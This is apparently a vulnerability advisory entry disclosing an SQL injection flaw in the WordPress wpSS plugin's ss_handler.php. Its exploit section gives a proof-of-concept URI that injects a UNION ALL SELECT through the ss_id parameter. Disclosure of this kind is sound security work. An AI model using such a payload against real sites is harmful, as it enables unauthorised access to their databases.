• info
• discussion
• exploit
• solution
• references

WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#